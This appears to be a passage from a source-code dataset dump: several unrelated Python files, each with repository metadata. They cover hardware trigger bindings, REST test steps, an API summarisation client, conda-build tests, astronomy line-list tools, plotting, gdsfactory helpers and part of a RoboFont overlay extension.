return value
def _set_event(self, value):
api.DevTrOutSetEvent(self._handle, self._index, value)
library.check_last_status_raise_on_error()
def _get_id(self):
""" Id. """
value = api.DevTrOutGetId(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _get_name(self):
""" Name. """
length = api.DevTrOutGetName(self._handle, self._index, None, 0)
library.check_last_status_raise_on_error()
buf = create_string_buffer(length + 1)
api.DevTrOutGetName(self._handle, self._index, buf, length)
library.check_last_status_raise_on_error()
return buf.value.decode('utf-8')
def trigger(self):
""" Trigger the specified device trigger output.
:returns: ``True`` if successful, ``False`` otherwise.
.. versionadded:: 0.6
"""
result = api.DevTrOutTrigger(self._handle, self._index)
library.check_last_status_raise_on_error()
return result != BOOL8_FALSE
enabled = property(_get_enabled, _set_enabled)
events = property(_get_events)
event = property(_get_event, _set_event)
id = property(_get_id)
name = property(_get_name)
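# --- Usage sketch (not part of the original module): in libtiepie the
# device object owns its trigger outputs and supplies `handle` and `index`,
# so the values below are illustrative only and left commented.
#
#   trigger_output = TriggerOutput(handle, 0)
#   trigger_output.enabled = True
#   trigger_output.trigger()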
| 33.028169 | 72 | 0.665245 | 2,250 | 0.959488 | 0 | 0 | 0 | 0 | 0 | 0 | 329 | 0.140299 |
c7b7578b3382d7cf2565fe8fe7621c5d451e663b | 1,374 | py | Python | conduit_rest/radish/conduit_rest_steps.py | dduleba/tw2019-ui-tests | 5f149c6c2bdb9f2d69a02c038248374f6b0b5903 | [
"MIT"
]
| 1 | 2019-09-27T23:12:07.000Z | 2019-09-27T23:12:07.000Z | conduit_rest/radish/conduit_rest_steps.py | dduleba/conduit-tests | 5f149c6c2bdb9f2d69a02c038248374f6b0b5903 | [
"MIT"
]
| null | null | null | conduit_rest/radish/conduit_rest_steps.py | dduleba/conduit-tests | 5f149c6c2bdb9f2d69a02c038248374f6b0b5903 | [
"MIT"
]
| null | null | null | import time
from faker import Faker
from radish_ext.radish.step_config import StepConfig
from conduit.client import ConduitClient, ConduitConfig
class ConduitStepsConfig(StepConfig):
def __init__(self, context):
super().__init__(context)
self._faker = None
self.client = ConduitClient(ConduitConfig().set_properties(context.cfg.get('conduit_backend').get('url')))
@property
def faker(self):
if self._faker is None:
self._faker = Faker(locale='en-us')
seed = time.time()
self.log.debug(f'Faker seed {seed}')
            self._faker.seed(seed)  # apply the logged seed so runs are reproducible
return self._faker
def get_conduit_config(context):
return ConduitStepsConfig.get_instance(context)
class ConduitRestBaseSteps(object):
def created_user(self, step, ):
"""created User"""
stc_rest = get_conduit_config(step.context)
user_model = {'user': {'username': stc_rest.faker.user_name(),
'password': stc_rest.faker.password(),
'email': stc_rest.faker.email()
}
}
stc_rest.test_data.data.update(user_model)
stc_rest.log.debug(user_model)
ret_json = stc_rest.client.users.register_user(**user_model['user'])
stc_rest.log.info(f'user created {ret_json}')
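# --- Usage sketch (not part of the original module): in a radish step file
# these base-step methods are typically bound to step patterns, e.g.:
#
#   from radish import given
#
#   @given("created User")
#   def created_user(step):
#       ConduitRestBaseSteps().created_user(step)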
| 31.227273 | 114 | 0.61936 | 1,134 | 0.825328 | 0 | 0 | 248 | 0.180495 | 0 | 0 | 132 | 0.09607 |
c7b88fe5b2537ef40175e1a577b998fdb2d3a5c9 | 1,233 | py | Python | SummaryExternalClient.py | Hackillinois2k18/Main-Repo | e998cc3283e0469b98a842220a30a72c5b105dad | [
"MIT"
]
| 5 | 2020-03-10T03:23:18.000Z | 2021-11-12T17:06:51.000Z | SummaryExternalClient.py | Hackillinois2k18/FyveBot | e998cc3283e0469b98a842220a30a72c5b105dad | [
"MIT"
]
| 3 | 2018-02-24T05:25:28.000Z | 2018-02-24T05:43:49.000Z | SummaryExternalClient.py | Hackillinois2k18/Main-Repo | e998cc3283e0469b98a842220a30a72c5b105dad | [
"MIT"
]
| 3 | 2019-01-20T14:50:11.000Z | 2021-11-12T17:06:55.000Z | import requests
import credentials
class SummaryExternalClient:
def pullSummaryForUrl(self, artUrl, title):
url = "https://api.aylien.com/api/v1/summarize"
headers = {"X-AYLIEN-TextAPI-Application-Key": credentials.AYLIEN_APP_KEY,
"X-AYLIEN-TextAPI-Application-ID" : credentials.AYLIEN_APP_ID}
params = {"url" : artUrl,
"title" : title,
"sentences_number": 7}
summary = requests.get(url=url, headers=headers, params=params)
try:
sentences = summary.json()['sentences']
        except (ValueError, KeyError):  # non-JSON response or missing key
sentences = []
return sentences
def pullSummaryForText(self, text, title):
url = "https://api.aylien.com/api/v1/summarize"
headers = {"X-AYLIEN-TextAPI-Application-Key": credentials.AYLIEN_APP_KEY,
"X-AYLIEN-TextAPI-Application-ID" : credentials.AYLIEN_APP_ID}
params = {"text": text,
"title": title,
"sentences_number": 7}
summary = requests.get(url=url, headers=headers, params=params)
try:
sentences = summary.json()['sentences']
        except (ValueError, KeyError):  # non-JSON response or missing key
sentences = []
return sentences
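# --- Usage sketch (not part of the original module): assumes credentials.py
# defines AYLIEN_APP_KEY and AYLIEN_APP_ID; the URL and title below are
# placeholders, so the calls are left commented.
#
#   client = SummaryExternalClient()
#   sentences = client.pullSummaryForUrl("https://example.com/article",
#                                        "Example title")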
| 35.228571 | 82 | 0.586375 | 1,194 | 0.96837 | 0 | 0 | 0 | 0 | 0 | 0 | 299 | 0.242498 |
c7b8b9fdf2de5fb240b87971d0e7f35941af2c81 | 1,485 | py | Python | tests/test_render.py | isuruf/conda-build | 9f163925f5d03a46e921162892bf4c6bc86b1072 | [
"BSD-3-Clause"
]
| null | null | null | tests/test_render.py | isuruf/conda-build | 9f163925f5d03a46e921162892bf4c6bc86b1072 | [
"BSD-3-Clause"
]
| 1 | 2019-10-08T15:03:56.000Z | 2019-10-08T15:03:56.000Z | tests/test_render.py | awwad/conda-build | b0be80283ec2e3ef7e49b5da923b1438e74e27b5 | [
"BSD-3-Clause"
]
| null | null | null | import os
import sys
from conda_build import api
from conda_build import render
import pytest
def test_output_with_noarch_says_noarch(testing_metadata):
testing_metadata.meta['build']['noarch'] = 'python'
output = api.get_output_file_path(testing_metadata)
assert os.path.sep + "noarch" + os.path.sep in output[0]
def test_output_with_noarch_python_says_noarch(testing_metadata):
testing_metadata.meta['build']['noarch_python'] = True
output = api.get_output_file_path(testing_metadata)
assert os.path.sep + "noarch" + os.path.sep in output[0]
def test_reduce_duplicate_specs(testing_metadata):
reqs = {'build': ['exact', 'exact 1.2.3 1', 'exact >1.0,<2'],
'host': ['exact', 'exact 1.2.3 1']
}
testing_metadata.meta['requirements'] = reqs
render._simplify_to_exact_constraints(testing_metadata)
assert (testing_metadata.meta['requirements']['build'] ==
testing_metadata.meta['requirements']['host'])
simplified_deps = testing_metadata.meta['requirements']
assert len(simplified_deps['build']) == 1
assert 'exact 1.2.3 1' in simplified_deps['build']
def test_pin_run_as_build_preserve_string(testing_metadata):
m = testing_metadata
m.config.variant['pin_run_as_build']['pkg'] = {
'max_pin': 'x.x'
}
dep = render.get_pin_from_build(
m,
'pkg * somestring*',
{'pkg': '1.2.3 somestring_h1234'}
)
assert dep == 'pkg >=1.2.3,<1.3.0a0 somestring*'
| 33 | 65 | 0.690909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 350 | 0.23569 |
c7b8e20d5ed5e23189a112d56d8a749537d1ecec | 173 | py | Python | ABC/007/b.py | fumiyanll23/AtCoder | 362ca9fcacb5415c1458bc8dee5326ba2cc70b65 | [
"MIT"
]
| null | null | null | ABC/007/b.py | fumiyanll23/AtCoder | 362ca9fcacb5415c1458bc8dee5326ba2cc70b65 | [
"MIT"
]
| null | null | null | ABC/007/b.py | fumiyanll23/AtCoder | 362ca9fcacb5415c1458bc8dee5326ba2cc70b65 | [
"MIT"
]
| null | null | null | def main():
# input
A = input()
# compute
# output
if A == 'a':
print(-1)
else:
print('a')
if __name__ == '__main__':
main()
| 10.8125 | 26 | 0.421965 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 40 | 0.231214 |
c7b94b2b66d38c20024028b233b4eaed057202d2 | 5,057 | py | Python | SPAE/read_write.py | simon-schuler/SPAE | 2b970e30838da258b969b316488e7963d66119be | [
"MIT"
]
| null | null | null | SPAE/read_write.py | simon-schuler/SPAE | 2b970e30838da258b969b316488e7963d66119be | [
"MIT"
]
| 1 | 2021-04-12T20:28:55.000Z | 2021-04-12T20:28:55.000Z | SPAE/read_write.py | simon-schuler/SPAE | 2b970e30838da258b969b316488e7963d66119be | [
"MIT"
]
| null | null | null | #Writing MOOG parameter file for the parameter, abundance, and error calculations.
#The parameter file only needs to be written once, at beginning of the routine, because the output
#files are overwritten with each itereation of the routine, only minimal output data are needed.
#
#The user can choose to have the parameter file written to screen by choosing verbose=True
#The user can choose to have more detailed MOOG output by chooseing the appropriate values for the
#MOOG input parameters.
import numpy as np
def param_file(linelist,atmosphere=0,molecules=1,lines=0,flux=0,damp=0,plot=0,units=0,verbose=False):
if verbose:
print('abfind')
print('terminal \'x11\'')
print('standard_out \'moog_out.1\'')
print('summary_out \'moog_out.2\'')
print('model_in \'star.mod\'')
print('lines_in \'' + linelist + '\'')
print('atmosphere ' + str(atmosphere))
print('molecules ' + str(molecules))
print('lines ' + str(lines))
print('flux/int ' + str(flux))
print('damping ' + str(damp))
print('plot ' + str(plot))
print('units ' + str(units))
with open('batch.par', 'wt') as file:
file.write('abfind' + '\n')
file.write('terminal \'x11\'' + '\n')
file.write('standard_out \'moog_out.1\'' + '\n')
file.write('summary_out \'moog_out.2\'' + '\n')
file.write('model_in \'star.mod\'' + '\n')
file.write('lines_in \'' + linelist + '\'' + '\n')
file.write('atmosphere ' + str(atmosphere) + '\n')
file.write('molecules ' + str(molecules) + '\n')
file.write('lines ' + str(lines) + '\n')
file.write('flux/int ' + str(flux) + '\n')
file.write('damping ' + str(damp) + '\n')
file.write('plot ' + str(plot) + '\n')
file.write('units ' + str(units) + '\n')
#Function for creating the solar and stellar linelists
def linelist_create(star_in, sun_in, direc_path):
with open(direc_path + '/linelist_star.txt', 'w') as out_star:
with open(direc_path + '/linelist_sun.txt', 'w') as out_sun:
with open(star_in) as file_star:
with open(sun_in) as file_sun:
line_star = file_star.readline()
out_star.write(line_star) #accounts for comment line in linelist files
line_sun = file_sun.readline()
out_sun.write(line_sun) #accounts for comment line in linelist files
line = file_star.readlines()
line_s = file_sun.readlines()
for line_star in line:
line_star_split = line_star.split()
#if len(line_star_split) < 2: continue
for line_sun in line_s:
line_sun_split = line_sun.split()
#if len(line_sun_split) < 2: continue
if line_star_split[0] == line_sun_split[0] and line_star_split[1] == line_sun_split[1]:
out_star.write(line_star)
out_sun.write(line_sun)
                                break  # match found; stop scanning the solar list
#Reads Moog output files, parsing elements and colums
def read_file(filename):
count = 0
elements = ['Fe I ', 'Fe II ', 'C I ', 'N I ', 'O I ', 'S I', 'K I ', 'Na I ', 'Mg I ', 'Al I ', 'Si I ', 'Ca I ', 'Sc II ', 'Ti I ', 'Ti II ', 'V ', 'Cr I ',
'Mn I ', 'Co I ', 'Ni I ', 'Cu I ', 'Zn I ', 'Ba II ']
dtype = [('wavelength', 'f8'),
('ID', 'f8'),
('EP', 'f8'),
('logGF', 'f8'),
('EWin', 'f8'),
('logRWin', 'f8'),
('abund', 'f8'),
('delavg', 'f8')]
abundances = []
el_found = []
with open(filename) as file:
while True:
count += 1
# Get next line from file
line = file.readline()
# if line is empty end of file is reached
if not line: break
for j, el in enumerate(elements):
species = 'Abundance Results for Species ' + el
if species in line:
new_arr = []
el_found.append(el)
line = file.readline().split()
line = file.readline().split()
while len(line) == 8:
new_arr.append(line)
line = file.readline().rstrip().split()
new_arr = np.array(new_arr)
new_arr = np.core.records.fromarrays(new_arr.T,dtype=dtype)
abundances.append(new_arr)
return el_found, abundances
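# --- Usage sketch (not part of the original module): the file names and the
# working-directory path below are placeholders, so the calls are commented.
#
#   param_file('linelist_star.txt', verbose=True)
#   linelist_create('star_lines.txt', 'sun_lines.txt', '/path/to/workdir')
#   elements_found, abundances = read_file('moog_out.2')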
| 41.45082 | 168 | 0.489816 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,760 | 0.348032 |
c7ba2b5a0bc557fae2df973eed4ab42b40580f6e | 1,862 | py | Python | lectures/optimization/optimization_plots.py | carolinalvarez/ose-course-scientific-computing | 4b816fa81320c88fc5f35b203f0541e0a1a00939 | [
"MIT"
]
| null | null | null | lectures/optimization/optimization_plots.py | carolinalvarez/ose-course-scientific-computing | 4b816fa81320c88fc5f35b203f0541e0a1a00939 | [
"MIT"
]
| null | null | null | lectures/optimization/optimization_plots.py | carolinalvarez/ose-course-scientific-computing | 4b816fa81320c88fc5f35b203f0541e0a1a00939 | [
"MIT"
]
| null | null | null | """Plots for optimization lecture."""
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import cm
def plot_contour(f, allvecs, legend_path):
"""Plot contour graph for function f."""
# Create array from values with at least two dimensions.
allvecs = np.atleast_2d(allvecs)
X, Y, Z = _get_grid(f)
CS = plt.contour(X, Y, Z)
plt.clabel(CS, inline=1, fontsize=10)
plt.title("objective function")
plt.xlabel("variable $x_1$")
plt.ylabel("variable $x_2$")
plt.rc("text", usetex=False)
plt.rc("font", family="serif")
plt.plot(1, 1, "r*", markersize=10, label="minimum")
plt.plot(4.5, -1.5, "bx", markersize=10, label="initial guess")
plt.plot(
np.array(allvecs)[:, 0], np.array(allvecs)[:, 1], "go", markersize=4, label=legend_path,
)
plt.legend()
return plt
def _get_grid(f):
"""Create a grid for function f."""
# create data to visualize objective function
n = 50 # number of discretization points along the x-axis
    m = 50  # number of discretization points along the y-axis
a = -2.0
b = 5.0 # extreme points in the x-axis
c = -2
d = 5.0 # extreme points in the y-axis
X, Y = np.meshgrid(np.linspace(a, b, n), np.linspace(c, d, m))
Z = np.zeros(X.shape)
argument = np.zeros(2)
for i in range(X.shape[0]):
for j in range(X.shape[1]):
argument[0] = X[i, j]
argument[1] = Y[i, j]
Z[i][j] = f(argument)
return X, Y, Z
def plot_surf(f):
"""Plot surface graph of function f."""
X, Y, Z = _get_grid(f)
fig = plt.figure()
ax = fig.gca(projection="3d")
# Plot the surface.
surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm)
plt.xlabel("variable $x_1$")
plt.ylabel("variable $x_2$")
fig.colorbar(surf)
plt.title("objective function")
| 27.791045 | 96 | 0.605263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 594 | 0.319012 |
c7ba60efd06c8906b83387592b8347e6da526db9 | 7,141 | py | Python | gdsfactory/functions.py | simbilod/gdsfactory | 4d76db32674c3edb4d16260e3177ee29ef9ce11d | [
"MIT"
]
| null | null | null | gdsfactory/functions.py | simbilod/gdsfactory | 4d76db32674c3edb4d16260e3177ee29ef9ce11d | [
"MIT"
]
| null | null | null | gdsfactory/functions.py | simbilod/gdsfactory | 4d76db32674c3edb4d16260e3177ee29ef9ce11d | [
"MIT"
]
| null | null | null | """All functions return a Component so you can easily pipe or compose them.
There are two types of functions:
- decorators: return the original component
- containers: return a new component
"""
from functools import lru_cache, partial
import numpy as np
from omegaconf import OmegaConf
from pydantic import validate_arguments
from gdsfactory.cell import cell
from gdsfactory.component import Component
from gdsfactory.components.text_rectangular import text_rectangular_multi_layer
from gdsfactory.port import auto_rename_ports
from gdsfactory.types import (
Anchor,
Axis,
ComponentSpec,
Float2,
Layer,
List,
Optional,
Strs,
)
cache = lru_cache(maxsize=None)
def add_port(component: Component, **kwargs) -> Component:
"""Return Component with a new port."""
component.add_port(**kwargs)
return component
@cell
def add_text(
component: ComponentSpec,
text: str = "",
text_offset: Float2 = (0, 0),
text_anchor: Anchor = "cc",
text_factory: ComponentSpec = text_rectangular_multi_layer,
) -> Component:
"""Return component inside a new component with text geometry.
Args:
component: component spec.
text: text string.
text_offset: relative to component anchor. Defaults to center (cc).
text_anchor: relative to component (ce cw nc ne nw sc se sw center cc).
text_factory: function to add text labels.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
t = component_new << text_factory(text)
t.move((np.array(text_offset) + getattr(ref.size_info, text_anchor)))
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
def add_texts(
components: List[ComponentSpec],
prefix: str = "",
index0: int = 0,
**kwargs,
) -> List[Component]:
"""Return a list of Component with text labels.
Args:
components: list of component specs.
prefix: Optional prefix for the labels.
index0: defaults to 0 (0, for first component, 1 for second ...).
keyword Args:
text_offset: relative to component size info anchor. Defaults to center.
text_anchor: relative to component (ce cw nc ne nw sc se sw center cc).
text_factory: function to add text labels.
"""
return [
add_text(component, text=f"{prefix}{i+index0}", **kwargs)
for i, component in enumerate(components)
]
@cell
def rotate(
component: ComponentSpec, angle: float = 90, recenter: bool = False
) -> Component:
"""Return rotated component inside a new component.
Most times you just need to place a reference and rotate it.
This rotate function just encapsulates the rotated reference into a new component.
Args:
component: spec.
angle: to rotate in degrees.
recenter: recenter component after rotating.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
origin_offset = ref.origin - np.array((ref.xmin, ref.ymin))
ref.rotate(angle)
if recenter:
ref.move(
origin=ref.center,
destination=np.array((ref.xsize / 2, ref.ysize / 2)) - origin_offset,
)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
rotate90 = partial(rotate, angle=90)
rotate90n = partial(rotate, angle=-90)
rotate180 = partial(rotate, angle=180)
@cell
def mirror(
component: ComponentSpec, p1: Float2 = (0, 1), p2: Float2 = (0, 0)
) -> Component:
"""Return new Component with a mirrored reference.
Args:
component: component spec.
p1: first point to define mirror axis.
p2: second point to define mirror axis.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
ref.mirror(p1=p1, p2=p2)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
@cell
def move(
component: Component,
origin=(0, 0),
destination=None,
axis: Optional[Axis] = None,
) -> Component:
"""Return new Component with a moved reference to the original component.
Args:
component: to move.
origin: of component.
destination: Optional x, y.
axis: x or y axis.
"""
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
ref.move(origin=origin, destination=destination, axis=axis)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
def move_port_to_zero(component: Component, port_name: str = "o1"):
"""Return a container that contains a reference to the original component.
The new component has port_name in (0, 0).
"""
if port_name not in component.ports:
raise ValueError(
f"port_name = {port_name!r} not in {list(component.ports.keys())}"
)
return move(component, -component.ports[port_name].midpoint)
def update_info(component: Component, **kwargs) -> Component:
"""Return Component with updated info."""
component.info.update(**kwargs)
return component
@validate_arguments
def add_settings_label(
component: Component, layer_label: Layer = (66, 0), settings: Optional[Strs] = None
) -> Component:
"""Add a settings label to a component.
Args:
component: spec.
layer_label: for label.
settings: tuple or list of settings. if None, adds all changed settings.
"""
d = (
{setting: component.get_setting(setting) for setting in settings}
if settings
else component.metadata.changed
)
component.add_label(text=OmegaConf.to_yaml(d), layer=layer_label)
return component
__all__ = (
"add_port",
"add_text",
"add_settings_label",
"auto_rename_ports",
"cache",
"mirror",
"move",
"move_port_to_zero",
"rotate",
"update_info",
)
if __name__ == "__main__":
import gdsfactory as gf
c = gf.components.mmi1x2(
length_mmi=10,
decorator=partial(add_settings_label, settings=["name", "length_mmi"]),
)
# c.show()
cr = rotate(component=c)
cr.show()
# cr = c.rotate()
# cr.pprint()
# cr.show()
# cm = move(c, destination=(20, 20))
# cm.show()
# cm = mirror(c)
# cm.show()
# cm = c.mirror()
# cm.show()
# cm2 = move_port_to_zero(cm)
# cm2.show()
# cm3 = add_text(c, "hi")
# cm3.show()
# cr = rotate(component=c)
# cr.show()
# print(component_rotated)
# component_rotated.pprint
# component_netlist = component.get_netlist()
# component.pprint_netlist()
| 25.967273 | 87 | 0.669654 | 0 | 0 | 0 | 0 | 3,884 | 0.543901 | 0 | 0 | 2,808 | 0.393222 |
c7ba7f82e01986b93c50e54b040c99061ee59d08 | 26,640 | py | Python | OverlayUFOs/Overlay UFOs.roboFontExt/lib/OverlayUFOs.py | connordavenport/fbOpenTools | 794c71d504cea1248c256bea11d5249b0a4144a1 | [
"Unlicense"
]
| null | null | null | OverlayUFOs/Overlay UFOs.roboFontExt/lib/OverlayUFOs.py | connordavenport/fbOpenTools | 794c71d504cea1248c256bea11d5249b0a4144a1 | [
"Unlicense"
]
| null | null | null | OverlayUFOs/Overlay UFOs.roboFontExt/lib/OverlayUFOs.py | connordavenport/fbOpenTools | 794c71d504cea1248c256bea11d5249b0a4144a1 | [
"Unlicense"
]
| null | null | null | #coding=utf-8
from __future__ import division
"""
# OVERLAY UFOS
For anyone looking in here, sorry the code is so messy. This is a standalone version of a script with a lot of dependencies.
"""
import os
from AppKit import * #@PydevCodeAnalysisIgnore
from vanilla import * #@PydevCodeAnalysisIgnore
from mojo.drawingTools import *
from mojo.events import addObserver, removeObserver
from mojo.extensions import getExtensionDefault, setExtensionDefault, getExtensionDefaultColor, setExtensionDefaultColor
from mojo.UI import UpdateCurrentGlyphView
from fontTools.pens.transformPen import TransformPen
from defconAppKit.windows.baseWindow import BaseWindowController
import unicodedata
#from lib.tools.defaults import getDefaultColor
from lib.tools.drawing import strokePixelPath
from lib.UI.spaceCenter.glyphSequenceEditText import splitText
from builtins import chr
selectedSymbol = u'•'
def SmallTextListCell(editable=False):
cell = NSTextFieldCell.alloc().init()
size = NSSmallControlSize #NSMiniControlSize
cell.setControlSize_(size)
font = NSFont.systemFontOfSize_(NSFont.systemFontSizeForControlSize_(size))
cell.setFont_(font)
cell.setEditable_(editable)
return cell
class TX:
"""
An agnostic way to get a naked font.
"""
@classmethod
def naked(cls, f):
try:
return f.naked()
except:
return f
class Tool():
"""
The tool object manages the font list. This is a simplification.
"""
fonts = AllFonts()
def addObserver(self, target, method, action):
addObserver(target, method, action)
def removeObserver(self, target, method, action):
removeObserver(target, method, action)
def getCurrentFont(self):
return CurrentFont()
def getFonts(self):
u"""Answers the list of selected fonts, ordered by their path.
"""
return self.fonts
def appendToFonts(self, path):
f = OpenFont(path, showUI=False)
self.fonts.append(f)
def removeFromFonts(self, path):
for i, f in enumerate(self.fonts):
if f.path == path:
del self.fonts[i]
def getFontPaths(self):
return [f.path or str(f.info.familyName)+" "+str(f.info.styleName) for f in self.getFonts()]
def getFontLabel(self, path):
if path is None:
return None
if not path:
return 'Untitled'
name = path.split('/')[-1]
status = selectedSymbol
return status, path, name
def getFontLabels(self):
labels = {}
for path in self.getFontPaths():
if path:
label = self.getFontLabel(path)
name = label[-1]
else:
name = 'Untitled'
if not name in labels:
labels[name] = []
labels[name].append(label)
sortedLabels = []
for _, labelSet in sorted(labels.items()):
if len(labelSet) == 1: # There is only a single font with this name
sortedLabels.append(labelSet[0])
else: # Otherwise we'll have to construct new names to show the difference
for status, path, name in sorted(labelSet):
sortedLabels.append((status, path, '%s "%s"' % (name, '/'.join(path.split('/')[:-1]))))
return sortedLabels
class C:
"""
Some constants.
"""
C2 = 100
BUTTON_WIDTH = 80
STYLE_CHECKBOXSIZE = 'small'
STYLE_LABELSIZE = 'small'
STYLE_RADIOSIZE = 'small'
L = 22
LL = 25
class OverlayUFOs(BaseWindowController):
DEFAULTKEY = "com.fontbureau.overlayUFO"
DEFAULTKEY_FILLCOLOR = "%s.fillColor" %DEFAULTKEY
DEFAULTKEY_STROKECOLOR = "%s.strokeColor" %DEFAULTKEY
DEFAULTKEY_STROKE = "%s.stroke" %DEFAULTKEY
DEFAULTKEY_FILL = "%s.fill" %DEFAULTKEY
FALLBACK_FILLCOLOR = NSColor.colorWithCalibratedRed_green_blue_alpha_(.5, 0, .5, .1)
FALLBACK_STROKECOLOR = NSColor.colorWithCalibratedRed_green_blue_alpha_(.5, 0, .5, .5)
VERSION = 1.0
NAME = u'Overlay UFOs'
MANUAL = u"""In the current glyph window, this will present the view the same glyph from a separate
UFO or set of UFOs.<br/>
This does NOT import the UFO into a background layer. Instead, it renders a outline directly from the UFO into the glyph window view.
<ul>
<li>There is no need to import duplicate data into a background layer.</li>
    <li>The source outline is always live; when changes are made to the source, they will automatically
    appear in the current window without re-importing.</li>
<li>The source font does not need to be opened with a UI.</li>
</ul>
<h3>DIALOG</h3>
<ul>
<li>A floating dialog is present to let you open and select source fonts, fill, stroke, color.</li>
<li>Source Fonts: The default source font list is self.getOpenFonts(). The refresh button will
return this list to self.getOpenFonts().</li>
<li>Adding Fonts: You can manually add fonts by selecting a UFO file.
The UFO file will open without an interface.</li>
<li>Removing Fonts: There are buttons for removing selected fonts and for clearing the source font list.</li>
</ul>
<h3>BUGS/IMPROVEMENTS</h3>
<ul>
<li>Known Issue: The source font is drawn on top of the current font, instead of behind it.
So, it is good to select a color with a low opacity.</li>
<li>Known Bug: If the glyph window for both source and current fonts are open, it is possible
to select and inadvertently edit the source outline in the current window. I don't know how to solve this.</li>
<li>Improvement?: Add options to scale the source font.</li>
<li>Improvement?: Set different colors, fill settings for each font?</li>
</ul>
"""
# Fixed width of the window.
VIEWMINSIZE = 400
VIEWSIZE = VIEWMINSIZE
VIEWMAXSIZE = VIEWMINSIZE
WINDOW_POSSIZE = (130, 20, VIEWSIZE, 260)
WINDOW_MINSIZE = (VIEWMINSIZE, 260)
WINDOW_MAXSIZE = (VIEWMAXSIZE, 260)
def getPathListDescriptor(self):
return [
dict(title='Status', key='status', cell=SmallTextListCell(editable=False), width=12, editable=False),
dict(title='Name', key='name', width=300, cell=SmallTextListCell(editable=False), editable=False),
dict(title='Path', key='path', width=0, editable=False),
]
################
# OBSERVERS AND UPDATERS
################
def fontSelectionChanged(self):
self.setSourceFonts()
def activateModule(self):
self.tool.addObserver(self, 'drawInactive', 'drawInactive')
self.tool.addObserver(self, 'drawBackground', 'drawBackground')
self.tool.addObserver(self, 'fontDidOpen', 'fontDidOpen')
self.tool.addObserver(self, 'fontWillClose', 'fontWillClose')
def deactivateModule(self):
removeObserver(self, 'drawBackground')
removeObserver(self, 'drawInactive')
removeObserver(self, 'fontDidOpen')
removeObserver(self, 'fontWillClose')
################
# CONTEXTS
################
def fontDidOpen(self, info):
font = info.get('font')
if font:
self.tool.fonts.append(font)
self.refreshCallback()
def fontWillClose(self, info):
font = info.get('font')
path = font.path
if path:
self.tool.removeFromFonts(path)
self.refreshCallback()
def __init__(self):
self.tool = Tool()
self.w = FloatingWindow((400, 200), "Overlay UFOs", minSize=(400, 200))
self.populateView()
self.getView().open()
def getView(self):
return self.w
def refreshCallback(self, sender=None):
"""
Update the font list.
"""
self.getView().fontList.set(self.getFontItems())
def resetCallback(self, sender=None):
"""
Resets the view to the currently opened fonts.
"""
self.tool.fonts = AllFonts()
self.getView().fontList.set(self.getFontItems())
def addCallback(self, sender=None):
"""
Open a font without UI and add it to the font list.
"""
f = OpenFont(None, showUI=False)
if f is None:
return
self.tool.appendToFonts(f.path)
self.refreshCallback()
def populateView(self):
"""
The UI
"""
self.fillColor = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
self.strokeColor = getExtensionDefaultColor(self.DEFAULTKEY_STROKECOLOR, self.FALLBACK_STROKECOLOR)
self.contextBefore = self.contextAfter = ''
# Populating the view can only happen after the view is attached to the window,
# or else the relative widths go wrong.
view = self.getView()
view.add = Button((-40, 3, 30, 22), '+', callback=self.addCallback)
view.reset = Button((-40, 30, 30, 22), chr(8634), callback=self.resetCallback)
# Flag to see if the selection list click is in progress. We are resetting the selection
# ourselves, using the list "buttons", but changing that selection will cause another
# list update, that should be ignored.
self._selectionChanging = False
# Indicate that we are a drawing module
self._canDraw = True
self.sources = []
x = y = 4
view.fontList = List((C.C2, y, 250, -65), self.getFontItems(),
selectionCallback=self.fontListCallback,
drawFocusRing=False,
enableDelete=False,
allowsMultipleSelection=False,
allowsEmptySelection=True,
drawHorizontalLines=True,
showColumnTitles=False,
columnDescriptions=self.getPathListDescriptor(),
rowHeight=16,
)
view.viewEnabled = CheckBox((x, y, C.BUTTON_WIDTH, 22), "Show",
callback=self.viewCallback, sizeStyle=C.STYLE_CHECKBOXSIZE,
value=True)
y += C.L
view.fill = CheckBox((x, y, 60, 22), "Fill", sizeStyle=C.STYLE_CHECKBOXSIZE,
#value=getExtensionDefault("%s.%s" %(self.DEFAULTKEY, "fill"), True),
value = True,
callback=self.fillCallback)
y += C.L
color = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
view.color = ColorWell((x, y, 60, 22),
color=color,
callback=self.colorCallback)
y += C.L + 5
view.stroke = CheckBox((x, y, 60, 22), "Stroke", sizeStyle=C.STYLE_CHECKBOXSIZE,
#value=getExtensionDefault("%s.%s" %(self.DEFAULTKEY, "stroke"), False),
value = False,
callback=self.strokeCallback)
y += C.LL
view.alignText = TextBox((x, y, 90, 50), 'Alignment', sizeStyle=C.STYLE_LABELSIZE)
y += C.L
view.align = RadioGroup((x, y, 90, 50), ['Left', 'Center', 'Right'], isVertical=True,
sizeStyle=C.STYLE_RADIOSIZE, callback=self.alignCallback)
view.align.set(0)
#view.contextLabel = TextBox((C.C2, -58, 90, 50), 'Contexts', sizeStyle=C.STYLE_LABELSIZE)
view.viewCurrent = CheckBox((C.C2, -60, 150, 22), "Always View Current", sizeStyle=C.STYLE_CHECKBOXSIZE,
value = False,
callback=self.contextEditCallback)
#view.contextUandlc = CheckBox((C.C2+170, -60, 85, 22), "Match Case", sizeStyle=C.STYLE_CHECKBOXSIZE,
# value = False,
# callback=self.contextEditCallback)
view.contextBefore = EditText((C.C2, -30, 85, 20), callback=self.contextEditCallback, continuous=True, sizeStyle="small", placeholder='Left Context')
